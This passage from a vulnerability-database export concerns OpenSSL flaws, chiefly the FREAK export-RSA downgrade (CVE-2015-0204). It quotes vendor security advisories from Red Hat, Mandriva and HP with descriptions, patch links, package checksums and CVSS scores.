"url": "https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2deee-50da9c14daae3/cert_mini_security_bulletin_xrx15a_v1-01.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685467" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098196" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097658" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182784" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684913" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691005" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097903" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098264" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098585" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686182" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21685967" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096510" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15568.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966557" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3509.html" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3507.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-3511.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=17160033765480453be0a41335fa6b833691c049" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=35207" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2308-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://h71000.www7.hp.com/openvms/products/ssl/ssl.html" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.3" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3505" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3508" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3507" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3506" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-5139" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3507" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3512" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3509" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6449" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3510" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3505" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-3511" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.17" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.5" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2308-1" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=2.1.0" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3510" }, { "db": "BID", "id": "69082" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127869" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-130" }, { "db": "NVD", "id": "CVE-2014-3510" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3510" }, { "db": "BID", "id": "69082" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "128248" }, { "db": "PACKETSTORM", "id": "127861" }, { "db": "PACKETSTORM", "id": "127869" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "129721" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-130" }, { "db": "NVD", "id": "CVE-2014-3510" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-08-13T00:00:00", "db": "VULMON", "id": "CVE-2014-3510" }, { "date": "2014-08-06T00:00:00", "db": "BID", "id": "69082" }, { "date": "2015-03-18T00:44:34", "db": "PACKETSTORM", "id": "130868" }, { "date": "2014-08-08T21:50:05", "db": "PACKETSTORM", "id": "127803" }, { "date": "2014-09-15T17:53:34", "db": "PACKETSTORM", "id": "128248" }, { "date": "2014-08-14T02:24:57", "db": "PACKETSTORM", "id": "127861" }, { "date": "2014-08-14T22:49:56", "db": "PACKETSTORM", "id": "127869" }, { "date": "2014-09-25T00:05:16", "db": "PACKETSTORM", "id": "128387" }, { "date": "2014-08-08T21:48:03", "db": "PACKETSTORM", "id": "127799" }, { "date": "2014-12-26T15:46:37", "db": "PACKETSTORM", "id": "129721" }, { "date": "2014-08-08T21:44:17", "db": "PACKETSTORM", "id": "127790" }, { "date": "2014-09-17T20:46:27", "db": "PACKETSTORM", "id": "128297" }, { "date": "2014-08-06T12:12:12", "db": "PACKETSTORM", "id": "169648" }, { "date": "2014-08-20T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-130" }, { "date": "2014-08-13T23:55:07.577000", "db": "NVD", "id": "CVE-2014-3510" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-29T00:00:00", "db": "VULMON", "id": "CVE-2014-3510" }, { "date": "2016-07-26T23:01:00", "db": "BID", "id": "69082" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-130" }, { "date": "2023-11-07T02:20:10.593000", "db": "NVD", "id": "CVE-2014-3510" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127790" }, { "db": "CNNVD", "id": "CNNVD-201408-130" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Security hole", "sources": [ { "db": "CNNVD", "id": "CNNVD-201408-130" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "69082" } ], "trust": 0.3 } }
var-201501-0338
Vulnerability from variot
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations. SSL/TLS Some implementations of export grade without intentional setting (512 Below bit ) of RSA Something accepts the key. Man-in-the-middle attacks against such software (man-in-the-middle attack) Is performed, the key used for encryption is decrypted, SSL/TLS The traffic content may be decrypted. this is" FREAK It is also called “attack”. Algorithm downgrade (CWE-757) CWE-757: Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') https://cwe.mitre.org/data/definitions/757.html Incorrect cipher strength (CWE-326) CWE-326: Inadequate Encryption Strength https://cwe.mitre.org/data/definitions/326.html SSL/TLS Some implementations of export grade without intentional setting (512 Below bit ) of RSA Something accepts the key. If a man-in-the-middle attack is performed on such software, it is guided to use a weak key in the negotiation at the start of communication, and as a result, encrypted information may be decrypted. The discoverer has released detailed information about this matter. FREAK: Factoring RSA Export Keys https://www.smacktls.com/#freakMan-in-the-middle attacks (man-in-the-middle attack) By SSL/TLS The contents of the communication may be decrypted. OpenSSL is prone to security-bypass vulnerability. Successfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks.
Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import (CVE-2015-0209).
The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly perform boolean-type comparisons, which allows remote attackers to cause a denial of service (invalid read operation and application crash) via a crafted X.509 certificate to an endpoint that uses the certificate-verification feature (CVE-2015-0286).
The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not reinitialize CHOICE and ADB data structures, which might allow attackers to cause a denial of service (invalid write operation and memory corruption) by leveraging an application that relies on ASN.1 structure reuse (CVE-2015-0287).
The X509_to_X509_REQ function in crypto/x509/x509_req.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow attackers to cause a denial of service (NULL pointer dereference and application crash) via an invalid certificate key (CVE-2015-0288).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (s2_lib.c assertion failure and daemon exit) via a crafted CLIENT-MASTER-KEY message (CVE-2015-0293). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Web Server 2.1.1 security update Advisory ID: RHSA-2016:1650-01 Product: Red Hat JBoss Web Server Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1650.html Issue date: 2016-08-22 CVE Names: CVE-2014-3570 CVE-2015-0204 CVE-2016-2105 CVE-2016-2106 CVE-2016-3110 CVE-2016-5387 =====================================================================
- Summary:
An update is now available for Red Hat JBoss Web Server.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.
This release serves as a replacement for Red Hat JBoss Web Server 2.1.0, and includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.1 Release Notes, linked to in the References section, for information on the most significant of these changes.
Security Fix(es):
-
It was discovered that httpd used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request. A malicious server could make a TLS/SSL client using OpenSSL use a weaker key exchange method. (CVE-2015-0204)
-
An integer overflow flaw, leading to a buffer overflow, was found in the way the EVP_EncodeUpdate() function of OpenSSL parsed very large amounts of input data. A remote attacker could use this flaw to crash an application using OpenSSL or, possibly, execute arbitrary code with the permissions of the user running that application. (CVE-2016-2105)
-
An integer overflow flaw, leading to a buffer overflow, was found in the way the EVP_EncryptUpdate() function of OpenSSL parsed very large amounts of input data. A remote attacker could use this flaw to crash an application using OpenSSL or, possibly, execute arbitrary code with the permissions of the user running that application. (CVE-2016-2106)
-
It was discovered that it is possible to remotely Segfault Apache http server with a specially crafted string sent to the mod_cluster via service messages (MCMP). (CVE-2016-3110)
-
It was found that OpenSSL's BigNumber Squaring implementation could produce incorrect results under certain special conditions. This flaw could possibly affect certain OpenSSL library functionality, such as RSA blinding. Note that this issue occurred rarely and with a low probability, and there is currently no known way of exploiting it. (CVE-2014-3570)
Red Hat would like to thank Scott Geary (VendHQ) for reporting CVE-2016-5387; the OpenSSL project for reporting CVE-2016-2105 and CVE-2016-2106; and Michal Karm Babacek for reporting CVE-2016-3110. Upstream acknowledges Guido Vranken as the original reporter of CVE-2016-2105 and CVE-2016-2106.
- Solution:
Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
The References section of this erratum contains a download link (you must log in to download the update).
Refer to the Red Hat JBoss Enterprise Web Server 2.1.1 Release Notes for a list of non security related fixes.
- Bugs fixed (https://bugzilla.redhat.com/):
1180184 - CVE-2015-0204 openssl: only allow ephemeral RSA keys in export ciphersuites (FREAK) 1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results 1326320 - CVE-2016-3110 mod_cluster: remotely Segfault Apache http server 1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow 1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow 1337151 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow [jbews-2.1.0] 1337155 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow [jbews-2.1.0] 1353755 - CVE-2016-5387 Apache HTTPD: sets environmental variable based on user supplied Proxy request header 1358118 - CVE-2016-5387 Apache HTTPD: sets environmental variable based on user supplied Proxy request header [jbews-2.1.0]
- References:
https://access.redhat.com/security/cve/CVE-2014-3570 https://access.redhat.com/security/cve/CVE-2015-0204 https://access.redhat.com/security/cve/CVE-2016-2105 https://access.redhat.com/security/cve/CVE-2016-2106 https://access.redhat.com/security/cve/CVE-2016-3110 https://access.redhat.com/security/cve/CVE-2016-5387 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=distributions&version=2.1.1 https://access.redhat.com/documentation/en-US/Red_Hat_JBoss_Web_Server/2.1/html/2.1.1_Release_Notes/index.html https://access.redhat.com/site/documentation/ https://access.redhat.com/site/documentation/en-US/JBoss_Enterprise_Web_Server/2/html-single/Installation_Guide/index.html https://access.redhat.com/security/vulnerabilities/httpoxy
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFXuz/AXlSAg2UNWIIRAnGKAJ9OG0AmFsej7cbv8xXILF5Lo7krOACdHUkC VkvGRKSu76E7WPtB8TOdqyw= =7UQL -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Softpaq: http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all- 4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all- 4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch applied, VMware cannot connect if security level is set to "Refuse insecure connections". Updating VMware to the latest package on ftp.hp.com will solve the problem.
A memory leak can occur in the dtls1_buffer_record function under certain conditions. In particular this could occur if an attacker sent repeated DTLS records with the same sequence number but for the next epoch. The memory leak could be exploited by an attacker in a Denial of Service attack through memory exhaustion (CVE-2015-0206).
When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is received the ssl method would be set to NULL which could later result in a NULL pointer dereference (CVE-2014-3569). This effectively removes forward secrecy from the ciphersuite (CVE-2014-3572). A server could present a weak temporary key and downgrade the security of the session (CVE-2015-0204).
An OpenSSL server will accept a DH certificate for client authentication without the certificate verify message. This only affects servers which trust a client certificate authority which issues certificates containing DH keys: these are extremely rare and hardly ever encountered (CVE-2015-0205).
OpenSSL accepts several non-DER-variations of certificate signature algorithm and signature encodings. OpenSSL also does not enforce a match between the signature algorithm between the signed and unsigned portions of the certificate. By modifying the contents of the signature algorithm or the encoding of the signature, it is possible to change the certificate's fingerprint. This does not allow an attacker to forge certificates, and does not affect certificate verification or OpenSSL servers/clients in any other way. It also does not affect common revocation mechanisms. Only custom applications that rely on the uniqueness of the fingerprint (e.g. certificate blacklists) may be affected (CVE-2014-8275).
The updated packages have been upgraded to the 1.0.0p version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 https://www.openssl.org/news/secadv_20150108.txt
Updated Packages:
Mandriva Business Server 1/X86_64: 08baba1b5ee61bdd0bfbcf81d465f154 mbs1/x86_64/lib64openssl1.0.0-1.0.0p-1.mbs1.x86_64.rpm 51198a2b577e182d10ad72d28b67288e mbs1/x86_64/lib64openssl-devel-1.0.0p-1.mbs1.x86_64.rpm aa34fd335001d83bc71810d6c0b14e85 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0p-1.mbs1.x86_64.rpm c8b6fdaba18364b315e78761a5aa0c1c mbs1/x86_64/lib64openssl-static-devel-1.0.0p-1.mbs1.x86_64.rpm fc67f3da9fcd1077128845ce85be93e2 mbs1/x86_64/openssl-1.0.0p-1.mbs1.x86_64.rpm ab8f672de2bf2f0f412034f89624aa32 mbs1/SRPMS/openssl-1.0.0p-1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFUr+PRmqjQ0CJFipgRAtFXAJ46+q0aetnJkb6I9RuYmX5xFeGx9wCgt1rb LHbCdAkBpYHYSuaUwpiAu1w= =ePa9 -----END PGP SIGNATURE----- . HP SSL for OpenVMS: All versions prior to 1.4-502.
HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the following locations:
- HP SSL for OpenVMS website:
http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
- HP Support Center website:
https://h20566.www2.hp.com/portal/site/hpsc/patch/home
Note: Login using your HP Passport account. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04774019
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04774019 Version: 1
HPSBMU03409 rev.1 - HP Matrix Operating Environment, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-08-24 Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Matrix Operating Environment. The vulnerabilities could be exploited remotely resulting in unauthorized modification, unauthorized access, or unauthorized disclosure of information.
References:
CVE-2010-5107 CVE-2013-0248 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-1692 CVE-2014-3523 CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8142 CVE-2014-8275 CVE-2014-9427 CVE-2014-9652 CVE-2014-9653 CVE-2014-9705 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 CVE-2015-0207 CVE-2015-0208 CVE-2015-0209 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-0285 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0290 CVE-2015-0291 CVE-2015-0292 CVE-2015-0293 CVE-2015-1787 CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 CVE-2015-2134 CVE-2015-2139 CVE-2015-2140 CVE-2015-2301 CVE-2015-2331 CVE-2015-2348 CVE-2015-2787 CVE-2015-3113 CVE-2015-5122 CVE-2015-5123 CVE-2015-5402 CVE-2015-5403 CVE-2015-5404 CVE-2015-5405 CVE-2015-5427 CVE-2015-5428 CVE-2015-5429 CVE-2015-5430 CVE-2015-5431 CVE-2015-5432 CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0 HP System Management Homepage (SMH) prior to version 7.5.0 HP Version Control Agent (VCA) prior to version 7.5.0 HP Version Control Repository Manager (VCRM) prior to version 7.5.0 HP Insight Orchestration prior to version 7.5.0 HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5107 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-0248 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 